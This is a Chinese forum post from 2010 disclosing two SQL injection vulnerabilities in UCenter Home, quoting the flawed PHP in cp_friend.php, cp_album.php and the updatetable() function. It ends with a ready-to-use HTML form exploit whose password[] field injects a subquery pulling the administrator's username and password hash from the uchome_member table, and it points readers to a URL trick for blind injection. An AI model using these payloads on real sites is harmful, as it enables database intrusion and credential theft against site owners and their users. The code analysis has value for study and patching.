|
|
by:xhming
1. source/cp_friend.php 文件
elseif($op == 'group') {
if(submitcheck('groupsubmin')) {
if(empty($_POST['fuids'])) {
showmessage('please_correct_choice_groups_friend');
}
$ids = simplode($_POST['fuids']);
$groupid = intval($_POST['group']);
updatetable('friend', array('gid'=>$groupid), "uid='$_SGLOBAL[supe_uid]' AND fuid IN ($ids) AND status='1'");
friend_cache($_SGLOBAL['supe_uid']);
showmessage('do_success', $_SGLOBAL['refer']);
}
$perpage = 50;
$page = empty($_GET['page'])?1:intval($_GET['page']);
if($page<1) $page = 1;
$start = ($page-1)*$perpage;
$list = array();
$multi = '';
$space['friendnum']=1;
if($space['friendnum']) {
$groups = getfriendgroup();
$theurl = 'cp.php?ac=friend&op=group';
$group = !isset($_GET['group'])?'-1':intval($_GET['group']);
if($group > -1) {
$wheresql = "AND main.gid='$group'"; //-----??
$theurl .= "&group=$group";
}
$count = $_SGLOBAL['db']->result($_SGLOBAL['db']->query("SELECT COUNT(*) FROM ".tname('friend')." main
WHERE main.uid='$space[uid]' AND main.status='1' $wheresql"), 0);
..........................................
$wheresql变量没有初始化,在这里不能用union只能盲注了
利用方式,注册两个用户,用其中一个通过uid来加,成功后在地址栏上加wheresql='就会看到出错提示!如:cp.php?ac=friend&op=group&wheresql=' exp就麻烦看官自己动手了!
2. source\cp_album.php
.....................
if($_GET['op'] == 'edit') {
if($albumid < 1) {
showmessage('photos_do_not_support_the_default_settings', "cp.php?ac=album&op=editpic", 0);
}
$query = $_SGLOBAL['db']->query("SELECT * FROM ".tname('album')." WHERE albumid='$albumid'");
if(!$album = $_SGLOBAL['db']->fetch_array($query)) {
showmessage('no_privilege');
}
if($album['uid'] != $_SGLOBAL['supe_uid'] && !checkperm('managealbum')) {
showmessage('no_privilege');
}
if(submitcheck('editsubmit')) {
$_POST['albumname'] = getstr($_POST['albumname'], 50, 1, 1, 1);
if(empty($_POST['albumname'])) {
showmessage('album_name_errors');
}
//隐私
$_POST['friend'] = intval($_POST['friend']);
$_POST['target_ids'] = '';
if($_POST['friend'] == 2) {
//特定好友
$uids = array();
$names = empty($_POST['target_names'])?array():explode(' ', str_replace(cplang('tab_space'), ' ', $_POST['target_names']));
if($names) {
$query = $_SGLOBAL['db']->query("SELECT uid FROM ".tname('space')." WHERE username IN (".simplode($names).")");
while ($value = $_SGLOBAL['db']->fetch_array($query)) {
$uids[] = $value['uid'];
}
}
if(empty($uids)) {
$_POST['friend'] = 3;//仅自己可见
} else {
$_POST['target_ids'] = implode(',', $uids);
}
} elseif($_POST['friend'] == 4) {
//加密
$_POST['password'] = trim($_POST['password']); //-------注意
if($_POST['password'] == '') $_POST['friend'] = 0;//公开
}
if($_POST['friend'] !== 2) {
$_POST['target_ids'] = '';
}
if($_POST['friend'] !== 4) {
$_POST['password'] == '';
}
updatetable('album', array('albumname'=>$_POST['albumname'], 'friend'=>$_POST['friend'], 'password'=>$_POST['password'], 'target_ids'=>$_POST['target_ids']), array('albumid'=>$albumid));
showmessage('do_success', "cp.php?ac=album&op=edit&albumid=$albumid");
}
......................................
可以看到$_POST['password']变量没有过滤,我们再看下updatetable函数
function updatetable($tablename, $setsqlarr, $wheresqlarr, $silent=0) {
global $_SGLOBAL;
$setsql = $comma = '';
foreach ($setsqlarr as $set_key => $set_value) {
if(is_array($set_value)) {
$setsql .= $comma.'`'.$set_key.'`'.'='.$set_value[0]; //--------注意
} else {
$setsql .= $comma.'`'.$set_key.'`'.'=\''.$set_value.'\'';
}
$comma = ', ';
}
$where = $comma = '';
if(empty($wheresqlarr)) {
$where = '1';
} elseif(is_array($wheresqlarr)) {
foreach ($wheresqlarr as $key => $value) {
$where .= $comma.'`'.$key.'`'.'=\''.$value.'\'';
$comma = ' AND ';
}
} else {
$where = $wheresqlarr;
}
$_SGLOBAL['db']->query('UPDATE '.tname($tablename).' SET '.$setsql.' WHERE '.$where,
$silent?'SILENT':'');
}
问题出现了$set_value为数组的话$set_value[0]两边没用单引号保护
鸡肋之处是有权限判断:if($album['uid'] != $_SGLOBAL['supe_uid'] && !checkperm('managealbum')) {
showmessage('no_privilege');}大家也可以找找看哪还用了此函数并可以利用的!
exp:
<form method="post" id="theform" name="theform" action="http://127.1/UCenter%20Home2/cp.php?ac=album&op=edit&albumid=1" class="c_form">
<input type="hidden" name="albumname" value="a" size="20" />
注入语句:<br>
<input type="text" name="password[]" value="0,target_ids=0,albumname=(select concat(username,0x7C,password) from uchome_member where uid=1) where albumid=1#" size="130" />
<input type="hidden" name="refer" value="" />
<input type="hidden" name="editsubmit" value="true" />
<input type="hidden" name="formhash" value="d5e7b9c3" />
<button name="submit" type="submit" class="submit" value="true">确定</button>
</form>
注:漏洞虽然鸡肋,但也算是和大家利流心得吧! |
|
狗仔卡
发表于 2010-2-7 11:25:00
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
显身卡